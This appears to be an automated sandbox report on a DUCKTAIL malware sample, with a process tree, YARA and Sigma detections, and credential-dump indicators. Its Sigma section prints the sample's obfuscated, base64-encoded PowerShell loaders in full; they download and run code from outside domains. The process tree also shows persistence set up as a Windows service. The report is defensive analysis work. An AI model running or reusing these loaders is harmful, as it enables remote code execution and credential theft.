    • cmd.exe (PID: 5776 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 4020 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 5828 cmdline: "cmd.exe" /c sc stop "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 3576 cmdline: sc stop "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 3372 cmdline: "cmd.exe" /c sc query myRdpService MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 6624 cmdline: sc query myRdpService MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 6160 cmdline: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • sc.exe (PID: 3184 cmdline: sc delete "myRdpService" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • sc.exe (PID: 7188 cmdline: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • net.exe (PID: 7256 cmdline: net start "myRdpService" MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net1.exe (PID: 7284 cmdline: C:\Windows\system32\net1 start "myRdpService" MD5: BA0BCCC6029FBBE6D8B41197F252742F)
    • powershell.exe (PID: 7720 cmdline: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • myRdpService.exe (PID: 7372 cmdline: C:\Windows\Temp\myRdpService.exe cakoi10 MD5: F651568CD1F1A7ABAEDD4389DA3A2F14)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DUCKTAILAccording to Tony Lambert, this is a malware written in .NET. It was observed to be delivered using the .NET Single File deployment feature.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.ducktail

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
gW6FHWNFzR.lnkJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security
    gW6FHWNFzR.lnkSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0x7e:$r1: PoW^ERShEl^L

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000002C.00000002.4250949857.00007FF6E0306000.00000004.00000001.01000000.0000000A.sdmphacktool_windows_moyix_creddumpcreddump is a python tool to extract credentials and secrets from Windows registry hives.@mimeframe
    • 0xdac4:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
    • 0x11f94:$a2: 0123456789012345678901234567890123456789
    • 0x328ac:$a3: NTPASSWORD
    • 0x2f774:$a4: LMPASSWORD
    • 0x5cc54:$a5: aad3b435b51404eeaad3b435b51404ee
    • 0x14f54:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
    Process Memory Space: powershell.exe PID: 3340INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x86bc6:$b1: ::WriteAllBytes(
    • 0x3bd633:$b1: ::WriteAllBytes(
    • 0x89021:$b2: ::FromBase64String(
    • 0x252ac7:$b2: ::FromBase64String(
    • 0x299ae4:$b2: ::FromBase64String(
    • 0x29a0f0:$b2: ::FromBase64String(
    • 0x29a465:$b2: ::FromBase64String(
    • 0x29a617:$b2: ::FromBase64String(
    • 0x29a78f:$b2: ::FromBase64String(
    • 0x29a7f8:$b2: ::FromBase64String(
    • 0x29a85e:$b2: ::FromBase64String(
    • 0x29a8c5:$b2: ::FromBase64String(
    • 0x29a922:$b2: ::FromBase64String(
    • 0x29a9a3:$b2: ::FromBase64String(
    • 0x29aa20:$b2: ::FromBase64String(
    • 0x29aa91:$b2: ::FromBase64String(
    • 0x29aaef:$b2: ::FromBase64String(
    • 0x29ab53:$b2: ::FromBase64String(
    • 0x29abaf:$b2: ::FromBase64String(
    • 0x29ac2f:$b2: ::FromBase64String(
    • 0x29ac9f:$b2: ::FromBase64String(
    Process Memory Space: powershell.exe PID: 8756INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x1fc0ee:$b1: ::WriteAllBytes(
    • 0x1e9aaf:$b2: ::FromBase64String(
    • 0x1ec728:$b2: ::FromBase64String(
    • 0x1ec9b4:$b2: ::FromBase64String(
    • 0x1eca1f:$b2: ::FromBase64String(
    • 0x1f313e:$b2: ::FromBase64String(
    • 0x85c16:$b3: ::UTF8.GetString(
    • 0xa3f20:$s1: -join
    • 0xa4bdb:$s1: -join
    • 0x276446:$s1: -join
    • 0x24d69:$s3: reverse
    • 0x24e04:$s3: reverse
    • 0x2d8d6:$s3: reverse
    • 0x134e5e:$s3: Reverse
    • 0x13ce05:$s3: Reverse
    • 0x13ce24:$s3: Reverse
    • 0x1408d9:$s3: Reverse
    • 0x14091e:$s3: Reverse
    • 0x14967f:$s3: Reverse
    • 0x149698:$s3: Reverse
    • 0x14d21c:$s3: Reverse
    Process Memory Space: svczHost.exe PID: 7664JoeSecurity_Ducktail_6Yara detected DucktailJoe Security
      Process Memory Space: svczHost.exe PID: 7664hacktool_windows_moyix_creddumpcreddump is a python tool to extract credentials and secrets from Windows registry hives.@mimeframe
      • 0x24b136:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
      • 0x24c892:$a2: 0123456789012345678901234567890123456789
      • 0x259237:$a3: NTPASSWORD
      • 0x257f7a:$a4: LMPASSWORD
      • 0x26aa4c:$a5: aad3b435b51404eeaad3b435b51404ee
      • 0x24d78a:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
      Click to see the 1 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      44.2.myRdpService.exe.7ff6dfe00000.0.unpackhacktool_windows_moyix_creddumpcreddump is a python tool to extract credentials and secrets from Windows registry hives.@mimeframe
      • 0x5118c4:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
      • 0x515d94:$a2: 0123456789012345678901234567890123456789
      • 0x5366ac:$a3: NTPASSWORD
      • 0x533574:$a4: LMPASSWORD
      • 0x560a54:$a5: aad3b435b51404eeaad3b435b51404ee
      • 0x518d54:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_8756.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xc5db:$b1: ::WriteAllBytes(
      • 0x8a37:$b2: ::FromBase64String(
      • 0xb6b1:$b2: ::FromBase64String(
      • 0xb93e:$b2: ::FromBase64String(
      • 0x52e:$b3: ::UTF8.GetString(
      • 0x868d:$s1: -join
      • 0x23e:$s4: +=
      • 0x261:$s4: +=
      • 0x1e39:$s4: +=
      • 0x1efb:$s4: +=
      • 0x6122:$s4: +=
      • 0x823f:$s4: +=
      • 0x8529:$s4: +=
      • 0x866f:$s4: +=
      • 0xbaf5:$s4: +=
      • 0xbcf2:$s4: +=
      • 0xdfb2:$s4: +=
      • 0x64887:$s4: +=
      • 0x64907:$s4: +=
      • 0x649cd:$s4: +=
      • 0x64a4d:$s4: +=

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit, CommandLine: "C:\Windows\system32\cmd.exe" /v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5060, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit, ProcessId: 1868, ProcessName: cmd.exe
      Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit, CommandLine: "C:\Windows\system32\cmd.exe" /v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5060, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /v /k "StaRT /Mi^n "" PoW^ERShEl^L -W H^ID^De^N -n^o^L^o^GO -N^oP -Ep bYPass -E^n^C^ode^DCo^mMa^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="" && exit, ProcessId: 1868, ProcessName: cmd.exe
      Sigma detected: PowerShell Base64 Encoded Invoke Keyword
      Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AYQA5ADMAMQA1ADIAOABjADIANgBlADEAYwA3ADgAZQA4ADcAYgBhAGYAYgBiAGYAYgBlADcAYwBkADMAZAAyAGUAYgA2ADIANQBlADYAOQAwADAAYwAzADYAZgA3AGUANABiADYANAA3AGUAZABmADYAOQAwADcANwAwADIAZAA2AGEAZQAyAGYAZAAyADIAYQA0AGMAOQBkAGYAOQA1ADcAYQA4AGIAYQBhADkAMwBhADMAYwAyAGEAMgA4AGMAMwAyAGMAYQAzADMAMAAwADYAYgBhAGYANQAzADkANQAzADEAZgA0ADEAZABhADQAZQA3AGYAYgA0ADQANAA0AGYAYQBkADMANQA0ADYAOABkAGIANQA2AGEAMgBiADgANQBlADUANgA4ADAAMwAwADMAYwA4AGQAYQBiADUAZgA4AGIANAA5ADIAMwA0ADAANgBiAGUAMgBhADMAMgAxADYAYQBhADcANAA4ADAAYQAzAGQAMgA3ADAAYwBkADgAOQBhADkAOAA0ADYAMQAwAGQANwA3AGUAZABlADUAZgBkADcAYwA3ADYAMQBmADIAMgBjAGQAMQA3ADgAYwA3ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQB
      Sigma detected: PowerShell Base64 Encoded WMI Classes
      Source: Process startedAuthor: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA, CommandLine: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -Execution
      Sigma detected: Suspicious Encoded PowerShell Command Line
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AYQA5ADMAMQA1ADIAOABjADIANgBlADEAYwA3ADgAZQA4ADcAYgBhAGYAYgBiAGYAYgBlADcAYwBkADMAZAAyAGUAYgA2ADIANQBlADYAOQAwADAAYwAzADYAZgA3AGUANABiADYANAA3AGUAZABmADYAOQAwADcANwAwADIAZAA2AGEAZQAyAGYAZAAyADIAYQA0AGMAOQBkAGYAOQA1ADcAYQA4AGIAYQBhADkAMwBhADMAYwAyAGEAMgA4AGMAMwAyAGMAYQAzADMAMAAwADYAYgBhAGYANQAzADkANQAzADEAZgA0ADEAZABhADQAZQA3AGYAYgA0ADQANAA0AGYAYQBkADMANQA0ADYAOABkAGIANQA2AGEAMgBiADgANQBlADUANgA4ADAAMwAwADMAYwA4AGQAYQBiADUAZgA4AGIANAA5ADIAMwA0ADAANgBiAGUAMgBhADMAMgAxADYAYQBhADcANAA4ADAAYQAzAGQAMgA3ADAAYwBkADgAOQBhADkAOAA0ADYAMQAwAGQANwA3AGUAZABlADUAZgBkADcAYwA3ADYAMQBmADIAMgBjAGQAMQA3ADgAYwA3ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAc